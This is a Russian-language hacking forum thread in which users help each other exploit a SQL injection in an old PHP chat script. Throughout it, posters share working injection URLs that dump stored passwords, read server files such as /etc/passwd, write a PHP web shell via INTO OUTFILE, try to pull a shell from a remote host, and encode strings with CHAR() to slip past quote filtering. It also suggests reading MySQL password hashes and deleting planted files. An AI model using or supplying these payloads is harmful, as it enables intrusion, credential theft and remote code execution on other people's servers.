Уважаемые,очень прошу помочь мне разобраться со следующей конструкцией:

На одном сервере установлен древний php скрипт одного чата с mysql базой.
Уязвимость заключается в скрипте редактирование профайла пользователей.Пример Запрос,типа

http://mysite.com/chе/usrs.php?L=russia&R='%20UNION%20SELECT%20pass,null,null, null%20FROM%20%20register_user%20/*

выдаст нам из таблицы register_user все пароли зарегестрированных пользователей. Таким образом можно узнать все данные из базы данных.

А теперь самое интересное,как мне модифицировать запрос,чтобы я смог работать(просматривать) файлы на сервере.Буду очень благодарен!

Вот так, если у тебя хватит прав:
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+LOAD_FILE('/etc/passwd'),null,null,null+FROM+register_user/*
/etc/passwd заменяй, на нужный файл.

Спасибо за помощь! Очень помог!!!! Кста как ты правильно первый файл указал)))


p.s. please change your last post (address)

И еще один вопрос: возможно ли получить список файлов в какой-либо директории при помощи данной injection (права позволяют)

Нет, читать содержимое директорий не получится.
Но если тебе хватает прав на чтение файлов, то можешь попробовать следующие вещи:
1. Залить шелл:http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',null,null,null+FROM+register_user+into+outfi le+'../shell.php'/*Дальше по анологии. Только не забудь поменять директорию, где есть права на запись.
2. Просмотри поле mysql.user.password в таблице mysql.user.

Блина емое,а как очистить.удалить файл поспешно созданный на сервере? Возможно такое?Спасибо.

<? system ("rm файл"); ?> Честно говоря не помню Как в Линуксе удаление... )))))

Ну шелл залей, а потом из него, как bul666 сказал: rm -rf ./file.php

http://site.com/vivat.php?r=russian&R='+UNION+SELECT+LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') ,null,null,null+FROM+reg_user+into+outfile+'/usr/local/www/site.com/picnic/shell.php'/*

На месте,где указан http адрес шелла http://www.hiliv.narod.ru/shell.txt, MySql громко икает с собщением об обшибке.Думаю виной здесь двойной слеш //. Можно ли как-то сформировать в данном случае успешный запрос.Заранее Приношу извинения за назойливость и огромное спасибо.

Забыл написать:
Выкидывается ошибка "MySQL error: 13 (Can't get stat of 'http:/www.hiliv.narod.ru/shell.txt'' (Errcode: 2)) "

тык наверное mysql ищет файл указаный loadfile у себя, а не на удаленной тачке.

insidex, LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') так нельзя, можно читать только локальные файлы. Также у тебя должны быть права на чтение этого файла и он не должен превышать определенного размера, установленного на сервере.

Спасибо за информацию! Ну тогла скажите,возможно ли записать через эту уязвимость в файл на сервере то,что у k1b0rg в подписи:)

А так как я тебе предлагал, не работает?
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',null,null,null+FROM+register_user+into+outfi le+'../shell.php'/*

К сожалению нет,пишет зараза:
MySQL error: 1267 (Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION')

Подскажите Ньюбу
Есть инъекция. Хочу сформировать запрос на заливку шела.
Кавычки не прокатывают. Хочу использовать функцию Char.
Внимание вопрос. Есть ли какой то простой вариант приобразовывать строку в Char символы?
Т.е. В виде примера ('/etc/passwd') в строку типа ,(char(47,101,116,99,47,112,97,115,115,119,100))
соответственно хочется конвертить свою строку.
Заранее спасиба.

http://quest.antichat.net/code.php

мм....?

Tnx